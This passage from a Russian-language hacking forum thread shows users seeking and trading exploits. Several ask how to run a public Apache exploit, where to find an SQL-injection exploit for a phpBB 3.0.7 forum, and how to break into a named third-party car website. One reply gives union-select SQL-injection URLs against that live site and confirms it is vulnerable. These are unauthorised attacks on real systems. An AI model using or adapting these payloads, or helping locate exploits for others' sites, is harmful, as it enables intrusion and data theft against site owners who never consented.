По идее в папке с апачем должен создаться. Но или я что-то не понимаю, или видео относится к другому эксплойту. Как показано на видео, в результате должен открыться порт на сервере и, приконнектившись к нему, ты получишь нулевые привилегии. Посмотрел код сплойта - не нашел строки, которая есть в cmd на том видео "check port 4444 for shell".
Я тоже смотрел код сплоита, и не увидел там ничего связанного с портом 4444. Поэтому предположил, что в sos.txt код бэкдора который открыл порт 4444. хз где взять этот код...
Подскажите как использовать http://www.exploit-db.com/exploits/15449/ пробовал так root@ubuntu:~# python2.7 15449.pl результат и так
Вообщем, вопрос действительно особой важности... надо, и хоть убей. Имеется форум, предположительно phpBB 3.0.7 PL-1. Сплоитов найти не удаётся... Может, не там ищу... Ссылочку не подкините ? Желательно , скулю... Заранее спасибо.
а ты искал вообще? Что то нашел в гугл, но не проверял : _http://securityhome.eu/exploits/exploit.php?eid=8646834484c84213245d653.76870877 _http://www.vfocus.net/art/20100906/7823.html
подскажите пожалуйста как тут быть http://jetterauto.ru/index/page/id/411%27 вроде как и скуля и вроде как и нет
Самая настоящая скуля. Правда вывода я не нашёл. Code: http://jetterauto.ru/index/page/id/411'+and+1=1+order+by+9+--+ Code: http://jetterauto.ru/index/page/id/411'+and+1=1+union+select+1,2,3,4,5,6,7,8,9+--+ UP Тут ещё скуля, но вывода также нету Code: http://jetterauto.ru/index/page/id/418/geo/23+and+1=2+union+select+111,222,333,444,555 UP2 Ещё скуля и опять нет вывода, крути как слепую... Code: http://jetterauto.ru/index/blog/id/4+and+1=1+union+select+1,2,3,4,5,6,77,8
я искал как обрубить запрос чтоб избежать ошибки В принципе - в этом случае обрубать ничего не нужно...